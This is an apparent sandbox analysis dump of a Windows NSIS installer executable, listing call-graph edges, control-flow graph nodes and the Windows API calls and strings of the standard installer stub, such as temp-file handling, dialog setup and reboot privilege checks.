GetCurrentProcess 3201->3210 3204->3181 3207 4037d2 3204->3207 3205 403635 3347 405ab8 lstrcpynW 3205->3347 3359 40141d 3207->3359 3265 4053f8 3208->3265 3212 403795 3210->3212 3211 4060ca 18 API calls 3213 4036f4 DeleteFileW 3211->3213 3212->3204 3214 403701 CopyFileW 3213->3214 3220 4036db 3213->3220 3214->3220 3215 40374a 3216 406526 42 API calls 3215->3216 3218 403751 3216->3218 3218->3172 3219 4060ca 18 API calls 3219->3220 3220->3211 3220->3215 3220->3219 3222 403735 CloseHandle 3220->3222 3351 406526 3220->3351 3356 4056ec CreateProcessW 3220->3356 3222->3220 3224 405be4 GetProcAddress 3223->3224 3225 405bd9 LoadLibraryA 3223->3225 3226 403458 SHGetFileInfoW 3224->3226 3225->3224 3225->3226 3227 405ab8 lstrcpynW 3226->3227 3227->3155 3228->3157 3230 405ae7 5 API calls 3229->3230 3232 40336c 3230->3232 3231 403376 3231->3164 3232->3231 3362 405fe6 lstrlenW CharPrevW 3232->3362 3235 40592d 2 API calls 3236 403392 3235->3236 3236->3164 3365 4058fe GetFileAttributesW CreateFileW 3237->3365 3239 40315b 3240 40316b 3239->3240 3366 405ab8 lstrcpynW 3239->3366 3240->3171 3242 403181 3367 406015 lstrlenW 3242->3367 3246 403192 GetFileSize 3247 4031a9 3246->3247 3262 40328e 3246->3262 3247->3240 3253 403351 3247->3253 3261 402e3a 6 API calls 3247->3261 3247->3262 3372 402e9e ReadFile 3247->3372 3249 403297 3249->3240 3251 4032d3 GlobalAlloc 3249->3251 3407 402ed0 SetFilePointer 3249->3407 3385 402ed0 SetFilePointer 3251->3385 3256 402e3a 6 API calls 3253->3256 3255 4032b4 3258 402e9e ReadFile 3255->3258 3256->3240 3257 4032ee 3386 402ee7 3257->3386 3260 4032bf 3258->3260 3260->3240 3260->3251 3261->3247 3374 402e3a 3262->3374 3263 4032fa 3263->3240 3263->3263 3264 403328 SetFilePointer 3263->3264 3264->3240 3266 405bbf 3 API calls 3265->3266 3267 40540e 3266->3267 3268 405414 3267->3268 3269 405426 3267->3269 3433 4059ff wsprintfW 3268->3433 3270 405981 3 API calls 3269->3270 3271 405457 3270->3271 3273 405476 lstrcatW 3271->3273 3275 405981 3 API calls 3271->3275 3274 405424 3273->3274 3424 4039fc 3274->3424 3275->3273 3278 406042 18 API calls 3279 4054a7 3278->3279 3280 405543 3279->3280 3282 405981 3 API calls 3279->3282 3281 406042 18 API calls 3280->3281 3283 40554e 3281->3283 3284 4054d9 3282->3284 3285 40555e LoadImageW 3283->3285 3286 4060ca 18 API calls 3283->3286 3284->3280 3289 4054fe lstrlenW 3284->3289 3293 4057b3 CharNextW 3284->3293 3287 405613 3285->3287 3288 405589 RegisterClassW 3285->3288 3286->3285 3292 40141d 2 API calls 3287->3292 3290 40561d 3288->3290 3291 4055ce SystemParametersInfoW CreateWindowExW 3288->3291 3294 405532 3289->3294 3295 40550c lstrcmpiW 3289->3295 3290->3172 3291->3287 3296 405619 3292->3296 3297 4054f9 3293->3297 3299 405fe6 3 API calls 3294->3299 3295->3294 3298 40551c GetFileAttributesW 3295->3298 3296->3290 3302 4039fc 19 API calls 3296->3302 3297->3289 3301 405528 3298->3301 3300 405538 3299->3300 3434 405ab8 lstrcpynW 3300->3434 3301->3294 3305 406015 2 API calls 3301->3305 3303 40562a 3302->3303 3306 405636 ShowWindow LoadLibraryW 3303->3306 3307 4056bc 3303->3307 3305->3294 3308 405655 LoadLibraryW 3306->3308 3309 40565c GetClassInfoW 3306->3309 3435 404b48 OleInitialize 3307->3435 3308->3309 3311 405689 DialogBoxParamW 3309->3311 3312 40566f GetClassInfoW RegisterClassW 3309->3312 3314 40141d 2 API calls 3311->3314 3312->3311 3313 4056c2 3315 4056c6 3313->3315 3316 4056de 3313->3316 3318 4056b1 3314->3318 3315->3290 3319 40141d 2 API calls 3315->3319 3317 40141d 2 API calls 3316->3317 3317->3290 3318->3290 3319->3290 3321 403403 3320->3321 3322 4033f5 CloseHandle 3320->3322 3450 40380b 3321->3450 3322->3321 3328 405762 3327->3328 3329 403677 ExitProcess 3328->3329 3330 405778 MessageBoxIndirectW 3328->3330 3330->3329 3331->3162 3502 405ab8 lstrcpynW 3332->3502 3334 406053 3503 405807 CharNextW CharNextW 3334->3503 3337 405ae7 5 API calls 3343 406069 3337->3343 3338 4060a2 lstrlenW 3339 4060a9 3338->3339 3338->3343 3341 405fe6 3 API calls 3339->3341 3340 405b98 2 API calls 3340->3343 3342 4060af GetFileAttributesW 3341->3342 3344 403626 3342->3344 3343->3338 3343->3340 3343->3344 3345 406015 2 API calls 3343->3345 3344->3172 3346 405ab8 lstrcpynW 3344->3346 3345->3338 3346->3205 3347->3208 3348->3195 3349->3200 3350->3220 3352 405bbf 3 API calls 3351->3352 3353 40652d 3352->3353 3355 40654e 3353->3355 3509 40635b lstrcpyW 3353->3509 3355->3220 3357 405727 3356->3357 3358 40571b CloseHandle 3356->3358 3357->3220 3358->3357 3360 40139b 2 API calls 3359->3360 3361 401432 3360->3361 3361->3181 3363 406003 lstrcatW 3362->3363 3364 40337e CreateDirectoryW 3362->3364 3363->3364 3364->3235 3365->3239 3366->3242 3368 406024 3367->3368 3369 403187 3368->3369 3370 40602a CharPrevW 3368->3370 3371 405ab8 lstrcpynW 3369->3371 3370->3368 3370->3369 3371->3246 3373 402ebf 3372->3373 3373->3247 3375 402e43 3374->3375 3376 402e5b 3374->3376 3377 402e53 3375->3377 3378 402e4c DestroyWindow 3375->3378 3379 402e63 3376->3379 3380 402e6b GetTickCount 3376->3380 3377->3249 3378->3377 3408 405bf6 3379->3408 3382 402e79 CreateDialogParamW ShowWindow 3380->3382 3383 402e9c 3380->3383 3382->3383 3383->3249 3385->3257 3387 402f02 3386->3387 3388 402f2f 3387->3388 3412 402ed0 SetFilePointer 3387->3412 3390 402e9e ReadFile 3388->3390 3391 402f3a 3390->3391 3392 402f53 GetTickCount 3391->3392 3393 4030ae 3391->3393 3399 402f3e 3391->3399 3396 402fa0 3392->3396 3392->3399 3394 4030b2 3393->3394 3395 4030d6 3393->3395 3397 402e9e ReadFile 3394->3397 3395->3399 3400 402e9e ReadFile 3395->3400 3401 4030f5 WriteFile 3395->3401 3398 402e9e ReadFile 3396->3398 3396->3399 3403 402ff2 GetTickCount 3396->3403 3404 403017 MulDiv wsprintfW 3396->3404 3406 40305b WriteFile 3396->3406 3397->3399 3398->3396 3399->3263 3400->3395 3401->3399 3402 403109 3401->3402 3402->3395 3402->3399 3403->3396 3413 404a73 3404->3413 3406->3396 3406->3399 3407->3255 3409 405c13 PeekMessageW 3408->3409 3410 402e69 3409->3410 3411 405c09 DispatchMessageW 3409->3411 3410->3249 3411->3409 3412->3388 3414 404a8c 3413->3414 3423 404b30 3413->3423 3415 404aaa lstrlenW 3414->3415 3416 4060ca 18 API calls 3414->3416 3417 404ad3 3415->3417 3418 404ab8 lstrlenW 3415->3418 3416->3415 3420 404ae6 3417->3420 3421 404ad9 SetWindowTextW 3417->3421 3419 404aca lstrcatW 3418->3419 3418->3423 3419->3417 3422 404aec SendMessageW SendMessageW SendMessageW 3420->3422 3420->3423 3421->3420 3422->3423 3423->3396 3425 403a10 3424->3425 3442 4059ff wsprintfW 3425->3442 3427 403a84 3428 4060ca 18 API calls 3427->3428 3429 403a90 SetWindowTextW 3428->3429 3430 403aab 3429->3430 3431 403ac6 3430->3431 3432 4060ca 18 API calls 3430->3432 3431->3278 3432->3430 3433->3274 3434->3280 3443 403937 3435->3443 3437 404b92 3438 403937 SendMessageW 3437->3438 3440 404ba4 OleUninitialize 3438->3440 3439 404b6b 3439->3437 3446 40139b 3439->3446 3440->3313 3442->3427 3444 403940 SendMessageW 3443->3444 3445 40394f 3443->3445 3444->3445 3445->3439 3448 4013a2 3446->3448 3447 401410 3447->3439 3448->3447 3449 4013dd MulDiv SendMessageW 3448->3449 3449->3448 3452 403819 3450->3452 3451 403408 3454 406559 3451->3454 3452->3451 3453 40381e FreeLibrary GlobalFree 3452->3453 3453->3451 3453->3453 3455 406042 18 API calls 3454->3455 3456 40656c 3455->3456 3457 406577 DeleteFileW 3456->3457 3458 40658e 3456->3458 3488 403414 CoUninitialize 3457->3488 3459 4066df 3458->3459 3494 405ab8 lstrcpynW 3458->3494 3459->3488 3499 405b98 FindFirstFileW 3459->3499 3461 4065b6 3462 4065c2 lstrcatW 3461->3462 3463 4065cc 3461->3463 3464 4065d2 3462->3464 3465 406015 2 API calls 3463->3465 3467 4065e2 lstrcatW 3464->3467 3468 4065d8 3464->3468 3465->3464 3470 4065ea lstrlenW FindFirstFileW 3467->3470 3468->3467 3468->3470 3475 4066ce 3470->3475 3491 406611 3470->3491 3471 405fe6 3 API calls 3473 4066fb 3471->3473 3472 4057b3 CharNextW 3472->3491 3474 4058de 2 API calls 3473->3474 3476 406701 RemoveDirectoryW 3474->3476 3475->3459 3477 40672b 3476->3477 3478 40670c 3476->3478 3480 404a73 25 API calls 3477->3480 3482 404a73 25 API calls 3478->3482 3478->3488 3480->3488 3481 4066ab FindNextFileW 3483 4066c3 FindClose 3481->3483 3481->3491 3484 40671a 3482->3484 3483->3475 3485 406526 42 API calls 3484->3485 3485->3488 3487 406559 63 API calls 3487->3491 3488->3178 3488->3179 3490 404a73 25 API calls 3490->3481 3491->3472 3491->3481 3491->3487 3491->3490 3492 404a73 25 API calls 3491->3492 3493 406526 42 API calls 3491->3493 3495 405ab8 lstrcpynW 3491->3495 3496 4058de GetFileAttributesW 3491->3496 3492->3491 3493->3491 3494->3461 3495->3491 3497 4058fb DeleteFileW 3496->3497 3498 4058ed SetFileAttributesW 3496->3498 3497->3491 3498->3497 3500 405bb9 3499->3500 3501 405bae FindClose 3499->3501 3500->3471 3500->3488 3501->3500 3502->3334 3504 405824 3503->3504 3506 405836 3503->3506 3505 405831 CharNextW 3504->3505 3504->3506 3508 40585a 3505->3508 3507 4057b3 CharNextW 3506->3507 3506->3508 3507->3506 3508->3337 3508->3344 3510 406380 3509->3510 3511 4063a9 GetShortPathNameW 3509->3511 3535 4058fe GetFileAttributesW CreateFileW 3510->3535 3513 406520 3511->3513 3514 4063c2 3511->3514 3513->3355 3514->3513 3516 4063ca WideCharToMultiByte 3514->3516 3515 406389 CloseHandle GetShortPathNameW 3515->3513 3517 4063a1 3515->3517 3516->3513 3518 4063e7 WideCharToMultiByte 3516->3518 3517->3511 3517->3513 3518->3513 3519 4063ff wsprintfA 3518->3519 3520 4060ca 18 API calls 3519->3520 3521 40642b 3520->3521 3536 4058fe GetFileAttributesW CreateFileW 3521->3536 3523 406438 3523->3513 3524 406445 GetFileSize GlobalAlloc 3523->3524 3525 406516 CloseHandle 3524->3525 3526 406466 ReadFile 3524->3526 3525->3513 3526->3525 3527 406480 3526->3527 3527->3525 3537 405864 lstrlenA 3527->3537 3530 406499 lstrcpyA 3533 4064bb 3530->3533 3531 4064ad 3532 405864 4 API calls 3531->3532 3532->3533 3534 4064ee SetFilePointer WriteFile GlobalFree 3533->3534 3534->3525 3535->3515 3536->3523 3538 4058a5 lstrlenA 3537->3538 3539 4058ad 3538->3539 3540 40587e lstrcmpiA 3538->3540 3539->3530 3539->3531 3540->3539 3541 40589c CharNextA 3540->3541 3541->3538 4343 402218 4344 40145c 18 API calls 4343->4344 4345 402220 4344->4345 4346 40145c 18 API calls 4345->4346 4347 40222b 4346->4347 4348 40145c 18 API calls 4347->4348 4349 402235 4348->4349 4350 40145c 18 API calls 4349->4350 4351 402240 4350->4351 4352 40145c 18 API calls 4351->4352 4354 40224b 4352->4354 4353 402260 CoCreateInstance 4356 402280 4353->4356 4354->4353 4355 40145c 18 API calls 4354->4355 4355->4353 4357 402c18 SendMessageW 4358 402c34 InvalidateRect 4357->4358 4359 402c58 4357->4359 4358->4359 3612 401f9b 3613 40145c 18 API calls 3612->3613 3614 401fa2 3613->3614 3615 40145c 18 API calls 3614->3615 3616 401fac 3615->3616 3617 40145c 18 API calls 3616->3617 3618 401fb7 3617->3618 3619 40145c 18 API calls 3618->3619 3620 401fc1 3619->3620 3624 401435 3620->3624 3623 401ff9 3625 404a73 25 API calls 3624->3625 3626 401443 ShellExecuteW 3625->3626 3626->3623 3627 40139b 3629 4013a2 3627->3629 3628 401410 3629->3628 3630 4013dd MulDiv SendMessageW 3629->3630 3630->3629 4360 401c1c 4361 401446 18 API calls 4360->4361 4362 401c26 4361->4362 4363 401446 18 API calls 4362->4363 4364 401c30 4363->4364 4367 4059ff wsprintfW 4364->4367 4366 402c58 4367->4366 4368 403c1f 4369 403c3a 4368->4369 4377 403d67 4368->4377 4373 403c74 4369->4373 4399 403b31 WideCharToMultiByte 4369->4399 4370 403dd2 4371 403ea4 4370->4371 4372 403ddc GetDlgItem 4370->4372 4378 403952 8 API calls 4371->4378 4374 403e65 4372->4374 4375 403df6 4372->4375 4380 4038c7 19 API calls 4373->4380 4374->4371 4383 403e77 4374->4383 4375->4374 4382 403e1c 6 API calls 4375->4382 4377->4370 4377->4371 4379 403da3 GetDlgItem SendMessageW 4377->4379 4381 403e9f 4378->4381 4404 40390d EnableWindow 4379->4404 4385 403cb4 4380->4385 4382->4374 4387 403e8d 4383->4387 4388 403e7d SendMessageW 4383->4388 4386 4038c7 19 API calls 4385->4386 4390 403cc1 CheckDlgButton 4386->4390 4387->4381 4391 403e93 SendMessageW 4387->4391 4388->4387 4389 403dcd 4392 4038e9 SendMessageW 4389->4392 4402 40390d EnableWindow 4390->4402 4391->4381 4392->4370 4394 403cdf GetDlgItem 4403 403920 SendMessageW 4394->4403 4396 403cf5 SendMessageW 4397 403d12 GetSysColor 4396->4397 4398 403d1b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4396->4398 4397->4398 4398->4381 4400 403b50 GlobalAlloc WideCharToMultiByte 4399->4400 4401 403b6e 4399->4401 4400->4401 4401->4373 4402->4394 4403->4396 4404->4389 4405 401ba0 4406 40145c 18 API calls 4405->4406 4407 401ba8 ExpandEnvironmentStringsW 4406->4407 4408 401bbb 4407->4408 4410 401bcd 4407->4410 4409 401bc1 lstrcmpW 4408->4409 4408->4410 4409->4410 4411 401822 4412 40145c 18 API calls 4411->4412 4413 401829 GetFullPathNameW 4412->4413 4416 401840 4413->4416 4420 401863 4413->4420 4414 402c58 4415 40187b GetShortPathNameW 4415->4414 4417 405b98 2 API calls 4416->4417 4416->4420 4418 401853 4417->4418 4418->4420 4421 405ab8 lstrcpynW 4418->4421 4420->4414 4420->4415 4421->4420 4422 401625 4423 40162b 4422->4423 4424 40139b 2 API calls 4423->4424 4425 401634 4424->4425 4426 401ca6 4427 40145c 18 API calls 4426->4427 4428 401cae 4427->4428 4429 401446 18 API calls 4428->4429 4430 401cb8 wsprintfW 4429->4430 4431 402c58 4430->4431 4432 4028ab 4433 401446 18 API calls 4432->4433 4435 4028b5 4433->4435 4434 402838 4435->4434 4436 4028ee ReadFile 4435->4436 4437 402946 4435->4437 4436->4434 4436->4435 4437->4434 4438 401446 18 API calls 4437->4438 4439 40298e 4438->4439 4440 402995 SetFilePointer 4439->4440 4440->4434 4441 4029a6 4440->4441 4443 4059ff wsprintfW 4441->4443 4443->4434 3635 40172d 3636 40145c 18 API calls 3635->3636 3637 401735 3636->3637 3638 405807 4 API calls 3637->3638 3649 40173d 3638->3649 3639 401786 3640 4017aa 3639->3640 3641 40178c 3639->3641 3646 401435 25 API calls 3640->3646 3643 401435 25 API calls 3641->3643 3642 4057b3 CharNextW 3644 40174b CreateDirectoryW 3642->3644 3645 401793 3643->3645 3647 401761 GetLastError 3644->3647 3644->3649 3653 405ab8 lstrcpynW 3645->3653 3652 4017b1 3646->3652 3647->3649 3650 40176e GetFileAttributesW 3647->3650 3649->3639 3649->3642 3650->3649 3651 40179e SetCurrentDirectoryW 3651->3652 3653->3651 4444 4026ae 4445 4026bc 4444->4445 4446 4026bd CloseHandle 4445->4446 4447 402c58 4446->4447 4448 402a2f 4449 40145c 18 API calls 4448->4449 4450 402a3c 4449->4450 4451 402a53 4450->4451 4452 40145c 18 API calls 4450->4452 4453 4058de 2 API calls 4451->4453 4452->4451 4454 402a59 4453->4454 4474 4058fe GetFileAttributesW CreateFileW 4454->4474 4456 402a66 4457 402a72 GlobalAlloc 4456->4457 4458 402b0f 4456->4458 4459 402b06 CloseHandle 4457->4459 4460 402a8b 4457->4460 4461 402b16 DeleteFileW 4458->4461 4462 402b29 4458->4462 4459->4458 4475 402ed0 SetFilePointer 4460->4475 4461->4462 4464 402a92 4465 402e9e ReadFile 4464->4465 4466 402a9b GlobalAlloc 4465->4466 4467 402aab 4466->4467 4468 402add WriteFile GlobalFree 4466->4468 4469 402ee7 33 API calls 4467->4469 4470 402ee7 33 API calls 4468->4470 4473 402ab9 4469->4473 4471 402b04 4470->4471 4471->4459 4472 402ad4 GlobalFree 4472->4468 4473->4472 4474->4456 4475->4464 4476 402b2f 4477 401446 18 API calls 4476->4477 4478 402b36 4477->4478 4479 401721 4478->4479 4480 402b85 4478->4480 4481 402b78 4478->4481 4483 4060ca 18 API calls 4480->4483 4482 401446 18 API calls 4481->4482 4482->4479 4483->4479 4484 4020af 4485 40145c 18 API calls 4484->4485 4486 4020b7 GetFileVersionInfoSizeW 4485->4486 4487 4020dd GlobalAlloc 4486->4487 4489 402c58 4486->4489 4488 4020f1 GetFileVersionInfoW 4487->4488 4487->4489 4490 402101 VerQueryValueW 4488->4490 4491 402132 GlobalFree 4488->4491 4490->4491 4492 40211a 4490->4492 4491->4489 4497 4059ff wsprintfW 4492->4497 4495 402126 4498 4059ff wsprintfW 4495->4498 4497->4495 4498->4491 4499 4029af 4503 405a18 4499->4503 4502 402c58 4504 4029bd FindClose 4503->4504 4504->4502 4505 402db4 4506 402dc6 SetTimer 4505->4506 4507 402ddf 4505->4507 4506->4507 4508 402e34 4507->4508 4509 402df9 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4507->4509 4509->4508 4510 404bb4 4511 404d61 4510->4511 4512 404bd5 GetDlgItem GetDlgItem GetDlgItem 4510->4512 4513 404d6a GetDlgItem CreateThread CloseHandle 4511->4513 4517 404d92 4511->4517 4556 403920 SendMessageW 4512->4556 4513->4517 4515 404c49 4521 404c50 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4515->4521 4516 404dc0 4520 404e1e 4516->4520 4523 404dd1 4516->4523 4524 404df7 ShowWindow 4516->4524 4517->4516 4518 404de2 4517->4518 4519 404dac ShowWindow ShowWindow 4517->4519 4525 403952 8 API calls 4518->4525 4558 403920 SendMessageW 4519->4558 4520->4518 4528 404e29 SendMessageW 4520->4528 4526 404ca3 SendMessageW SendMessageW 4521->4526 4527 404cbf 4521->4527 4529 4038a0 SendMessageW 4523->4529 4531 404e17 4524->4531 4532 404e09 4524->4532 4530 404d5a 4525->4530 4526->4527 4535 404cd2 4527->4535 4536 404cc4 SendMessageW 4527->4536 4528->4530 4537 404e42 CreatePopupMenu 4528->4537 4529->4518 4534 4038a0 SendMessageW 4531->4534 4533 404a73 25 API calls 4532->4533 4533->4531 4534->4520 4538 4038c7 19 API calls 4535->4538 4536->4535 4539 4060ca 18 API calls 4537->4539 4540 404ce2 4538->4540 4541 404e52 AppendMenuW 4539->4541 4542 404ceb ShowWindow 4540->4542 4543 404d1f GetDlgItem SendMessageW 4540->4543 4544 404e65 GetWindowRect 4541->4544 4545 404e78 4541->4545 4546 404d01 ShowWindow 4542->4546 4547 404d0e 4542->4547 4543->4530 4549 404d42 SendMessageW SendMessageW 4543->4549 4548 404e7f TrackPopupMenu 4544->4548 4545->4548 4546->4547 4557 403920 SendMessageW 4547->4557 4548->4530 4550 404e9d 4548->4550 4549->4530 4552 404eb9 SendMessageW 4550->4552 4552->4552 4553 404ed6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4552->4553 4554 404efb SendMessageW 4553->4554 4554->4554 4555 404f26 GlobalUnlock SetClipboardData CloseClipboard 4554->4555 4555->4530 4556->4515 4557->4543 4558->4516 4559 4017b6 4560 40145c 18 API calls 4559->4560 4561 4017bd 4560->4561 4562 405b98 2 API calls 4561->4562 4563 4017c3 4562->4563 4564 402bb6 4565 401446 18 API calls 4564->4565 4566 402bbd 4565->4566 4567 4060ca 18 API calls 4566->4567 4568 401721 4566->4568 4567->4568 4569 401639 4570 404a73 25 API calls 4569->4570 4571 401641 4570->4571 4572 40243c 4573 40145c 18 API calls 4572->4573 4574 402454 4573->4574 4575 40145c 18 API calls 4574->4575 4576 40245e 4575->4576 4577 40145c 18 API calls 4576->4577 4578 402469 GetPrivateProfileStringW lstrcmpW 4577->4578

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 403415-4034ab #17 SetErrorMode OleInitialize call 405bbf SHGetFileInfoW call 405ab8 GetCommandLineW call 405ab8 GetModuleHandleW 7 4034b5-4034c9 call 4057b3 CharNextW 0->7 8 4034ad-4034b0 0->8 11 40355a-403560 7->11 8->7 12 403566 11->12 13 4034ce-4034d4 11->13 14 403585-40359d GetTempPathW call 403360 12->14 15 4034d6-4034db 13->15 16 4034dd-4034e1 13->16 25 4035c3-4035dd DeleteFileW call 40311b 14->25 26 40359f-4035bd GetWindowsDirectoryW lstrcatW call 403360 14->26 15->15 15->16 18 4034e3-4034e7 16->18 19 4034e8-4034ec 16->19 18->19 20 403549-403556 call 4057b3 19->20 21 4034ee-4034f4 19->21 20->11 34 403558-403559 20->34 23 4034f6-4034fe 21->23 24 40350a-40351c call 403394 21->24 28 403500-403503 23->28 29 403505 23->29 40 403532-403547 call 403394 24->40 41 40351e-403526 24->41 38 403654-403663 call 4033eb CoUninitialize 25->38 39 4035df-4035e5 25->39 26->25 26->38 28->24 28->29 29->24 34->11 54 403756-40375c 38->54 55 403669-403679 call 40574d ExitProcess 38->55 42 403644-40364b call 4053f8 39->42 43 4035e7-4035f0 call 4057b3 39->43 40->20 56 403568-403580 call 4076da call 405ab8 40->56 45 403528-40352b 41->45 46 40352d 41->46 53 403650 42->53 57 403608-40360a 43->57 45->40 45->46 46->40 53->38 59 4037d9-4037e1 54->59 60 40375e-40377b call 405bbf * 3 54->60 56->14 64 4035f2-403604 call 403394 57->64 65 40360c-403616 57->65 66 4037e3 59->66 67 4037e7 59->67 91 4037c5-4037d0 ExitWindowsEx 60->91 92 40377d-40377f 60->92 64->65 78 403606-403607 64->78 72 403618-403628 call 406042 65->72 73 40367f-403699 lstrcatW lstrcmpiW 65->73 66->67 72->38 85 40362a-403640 call 405ab8 * 2 72->85 73->38 77 40369b-4036b1 CreateDirectoryW SetCurrentDirectoryW 73->77 81 4036b3-4036b9 call 405ab8 77->81 82 4036be-4036de call 405ab8 * 2 77->82 78->57 81->82 99 4036e3-4036ff call 4060ca DeleteFileW 82->99 85->42 91->59 96 4037d2-4037d4 call 40141d 91->96 92->91 97 403781-403783 92->97 96->59 97->91 101 403785-403797 GetCurrentProcess 97->101 106 403740-403748 99->106 107 403701-403711 CopyFileW 99->107 101->91 105 403799-4037bb 101->105 105->91 106->99 108 40374a-403751 call 406526 106->108 107->106 109 403713-403733 call 406526 call 4060ca call 4056ec 107->109 108->38 109->106 119 403735-40373c CloseHandle 109->119 119->106
                    APIs
                    • #17.COMCTL32 ref: 00403434
                    • SetErrorMode.KERNELBASE(00008001), ref: 0040343F
                    • OleInitialize.OLE32(00000000), ref: 00403446
                      • Part of subcall function 00405BBF: GetModuleHandleA.KERNEL32(?,?,00000020,00403458,00000008), ref: 00405BCF
                      • Part of subcall function 00405BBF: LoadLibraryA.KERNELBASE(?,?,00000020,00403458,00000008), ref: 00405BDA
                      • Part of subcall function 00405BBF: GetProcAddress.KERNEL32(00000000,?), ref: 00405BEB
                    • SHGetFileInfoW.SHELL32(0040856C,00000000,?,000002B4,00000000), ref: 0040346E
                      • Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5
                    • GetCommandLineW.KERNEL32(004732A0,NSIS Error), ref: 00403483
                    • GetModuleHandleW.KERNEL32(00000000,004CC0A0,00000000), ref: 00403496
                    • CharNextW.USER32(00000000,004CC0A0,00000020), ref: 004034BD
                    • GetTempPathW.KERNEL32(00002004,004E00C8,00000000,00000020), ref: 00403590
                    • GetWindowsDirectoryW.KERNEL32(004E00C8,00001FFF), ref: 004035A5
                    • lstrcatW.KERNEL32(004E00C8,\Temp), ref: 004035B1
                    • DeleteFileW.KERNELBASE(004DC0C0), ref: 004035C8
                    • CoUninitialize.COMBASE(?), ref: 00403659
                    • ExitProcess.KERNEL32 ref: 00403679
                    • lstrcatW.KERNEL32(004E00C8,~nsu.tmp), ref: 00403685
                    • lstrcmpiW.KERNEL32(004E00C8,004D80B8,004E00C8,~nsu.tmp), ref: 00403691
                    • CreateDirectoryW.KERNEL32(004E00C8,00000000), ref: 0040369D
                    • SetCurrentDirectoryW.KERNEL32(004E00C8), ref: 004036A4
                    • DeleteFileW.KERNEL32(0043BD40,0043BD40,?,00480008,0040850C,0047C000,?), ref: 004036F5
                    • CopyFileW.KERNEL32(004E80D8,0043BD40,00000001), ref: 00403709
                    • CloseHandle.KERNEL32(00000000,0043BD40,0043BD40,?,0043BD40,00000000), ref: 00403736
                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 0040378C
                    • ExitWindowsEx.USER32(00000002,00000000), ref: 004037C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                    • API String ID: 2435955865-3712954417
                    • Opcode ID: 7a316b5055b30f9aaac34ad57f3eca8da3b8ee04e2000637dca67fb3c636fbe9
                    • Instruction ID: 24a773ffd11e725b17f64a587af86d00896606ebd673f2b671a94fa35e787169
                    • Opcode Fuzzy Hash: 7a316b5055b30f9aaac34ad57f3eca8da3b8ee04e2000637dca67fb3c636fbe9
                    • Instruction Fuzzy Hash: BBA1E670500701BBD6207F629D4AB1B7E9CEB01705F10483FF985B62D2DBBD9A458BAE

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 415 405b98-405bac FindFirstFileW 416 405bb9 415->416 417 405bae-405bb7 FindClose 415->417 418 405bbb-405bbc 416->418 417->418
                    APIs
                    • FindFirstFileW.KERNELBASE(?,00464A20,0045FE18,00406093,0045FE18), ref: 00405BA3
                    • FindClose.KERNEL32(00000000), ref: 00405BAF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID: JF
                    • API String ID: 2295610775-1378213080
                    • Opcode ID: 8a2fef2aada0d280f7cfc8c7f2d825c9d5ff996b33c7372124f3e42565b734a1
                    • Instruction ID: 1ee526d225bc4302f24aa9e13179370b3debcda52a21c952381bfba9845ea930
                    • Opcode Fuzzy Hash: 8a2fef2aada0d280f7cfc8c7f2d825c9d5ff996b33c7372124f3e42565b734a1
                    • Instruction Fuzzy Hash: 51D022301095206FC60003386D0C88B3A28EF0A3303104B32F1A5F22E0C7B4AC638A9C

                    Control-flow Graph

                    • Executed
                    • Not Executed
